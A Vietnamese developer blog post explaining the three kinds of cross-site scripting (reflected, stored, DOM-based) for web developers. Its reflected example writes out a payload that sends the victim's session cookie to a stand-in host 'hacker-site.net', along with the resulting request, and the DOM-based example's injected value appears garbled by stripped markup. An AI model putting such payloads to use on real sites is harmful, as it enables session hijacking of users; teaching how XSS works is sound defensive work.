Tìm Hiểu Về Lỗ Hổng Cross-Site Scripting - FLINTERS Developer's Blog

Tiếp nối loạt bài về Security, hôm nay chúng ta sẽ cùng nhau tìm hiểu về lỗ hổng Cross-Site Scripting.

1. Cross-site Scripting là gì?

Cross-site scripting là một lỗ hổng phổ biến trong ứng dụng web. Để khai thác một lỗ hổng XSS, hacker sẽ chèn mã độc thông qua các đoạn script để thực thi chúng ở phía client. Thông thường, các cuộc tấn công XSS được sử dụng để vượt qua các kiểm soát truy cập và mạo danh người dùng. Phân loại: Có 3 loại Reflected XSS, Stored XSS và DOM-based XSS

2. Reflected XSS

Ở kịch bản này, hacker sẽ gửi cho nạn nhân một URL có chứa đoạn mã nguy hiểm. Nạn nhân chỉ cần gửi request đến URL này thì hacker sẽ có được kết quả mong muốn. Cụ thể: 1. Người dùng đăng nhập web và giả sử được gán session: Set-Cookie: sessId=5e2c648fa5ef8d653adeede595dcde6f638639e4e59d4 2. Bằng cách nào đó, hacker gửi được cho người dùng URL: http://example.com/name=var+i=new+Image;+i.src=”http://hacker-site.net/”%2bdocument.cookie; Giả sử example.com là website nạn nhân truy cập, hacker-site.net là trang của hacker tạo ra 3. Nạn nhân truy cập đến URL trên 4. Server phản hồi cho nạn nhân, kèm với dữ liệu có trong request(đoạn javascript của hacker) 5. Trình duyệt nạn nhân nhận phản hồi và thực thi đoạn javascript 6. Đoạn javascript mà hacker tạo ra thực tế như sau: var i=new Image; i.src=”http://hacker-site.net/”+document.cookie; Dòng lệnh trên bản chất thực hiện request đến site của hacker với tham số là cookie người dùng: GET /sessId=5e2c648fa5ef8d653adeede595dcde6f638639e4e59d4 HTTP/1.1 Host: hacker-site.net 7. Từ phía site của mình, hacker sẽ bắt được nội dung request trên và coi như session của người dùng sẽ bị chiếm. Đến lúc này, hacker có thể giả mạo với tư cách nạn nhân và thực hiện mọi quyền trên website mà nạn nhân có. Kịch bản khai thác:

3. Stored XSS:

Khác với Reflected tấn công trực tiếp vào một số nạn nhân mà hacker nhắm đến, Stored XSS hướng đến nhiều nạn nhân hơn. Lỗi này xảy ra khi ứng dụng web không kiểm tra kỹ các dữ liệu đầu vào trước khi lưu vào cơ sở dữ liệu (ở đây tôi dùng khái niệm này để chỉ database, file hay những khu vực khác nhằm lưu trữ dữ liệu của ứng dụng web). Ví dụ như các form góp ý, các comment … trên các trang web. Với kỹ thuật Stored XSS , hacker không khai thác trực tiếp mà phải thực hiện tối thiểu qua 2 bước. Đầu tiên hacker sẽ thông qua các điểm đầu vào (form, input, textarea…) không được kiểm tra kỹ để chèn vào CSDL các đoạn mã nguy hiểm. Tiếp theo, khi người dùng truy cập vào ứng dụng web và thực hiện các thao tác liên quan đến dữ liệu được lưu này, đoạn mã của hacker sẽ được thực thi trên trình duyệt người dùng. Kịch bản khai thác:

Reflected XSS và Stored XSS có 2 sự khác biệt lớn trong quá trình tấn công. • Thứ nhất, để khai thác Reflected XSS, hacker phải lừa được nạn nhân truy cập vào URL của mình. Còn Stored XSS không cần phải thực hiện việc này, sau khi chèn được mã nguy hiểm vào CSDL của ứng dụng, hacker chỉ việc ngồi chờ nạn nhân tự động truy cập vào. Với nạn nhân, việc này là hoàn toàn bình thường vì họ không hề hay biết dữ liệu mình truy cập đã bị nhiễm độc. • Thứ 2, mục tiêu của hacker sẽ dễ dàng đạt được hơn nếu tại thời điểm tấn công nạn nhân vẫn trong phiên làm việc(session) của ứng dụng web. Với Reflected XSS, hacker có thể thuyết phục hay lừa nạn nhân đăng nhập rồi truy cập đến URL mà hắn ta cung cấp để thực thi mã độc. Nhưng Stored XSS thì khác, vì mã độc đã được lưu trong CSDL Web nên bất cứ khi nào người dùng truy cập các chức năng liên quan thì mã độc sẽ được thực thi, và nhiều khả năng là những chức năng này yêu cầu phải xác thực(đăng nhập) trước nên hiển nhiên trong thời gian này người dùng vẫn đang trong phiên làm việc. Từ những điều này có thể thấy Stored XSS nguy hiểm hơn Reflected XSS rất nhiều, đối tượng bị ảnh hưởng có thế là tất cả nhưng người sử dụng ứng dụng web đó. Và nếu nạn nhân có vai trò quản trị thì còn có nguy cơ bị chiếm quyền điều khiển web.

4. DOM Based XSS

DOM Based XSS là kỹ thuật khai thác XSS dựa trên việc thay đổi cấu trúc DOM của tài liệu, cụ thể là HTML. Chúng ta cùng xem xét một ví dụ cụ thể sau. Một website có URL đến trang đăng ký như sau: http://example.com/register.php?message=Please fill in the form Khi truy cập đến thì chúng ta thấy một Form rất bình thường Thay vì truyền

message=Please fill in the form

thì truyền

message=GenderMaleFemalefunction show(){alert();}

Người dùng sẽ chẳng chút nghi ngờ với một form “bình thường” như thế này, và khi lựa chọn giới tính, Script sẽ được thực thi

Kịch bản khai thác:

Ở phần sau, chúng ta sẽ tìm hiểu cách phòng tránh XSS và một số ví dụ.

Tham khảo: http://securitydaily.net

Post Views: 3,739

No related posts.

Từ khóa » Các Loại Xss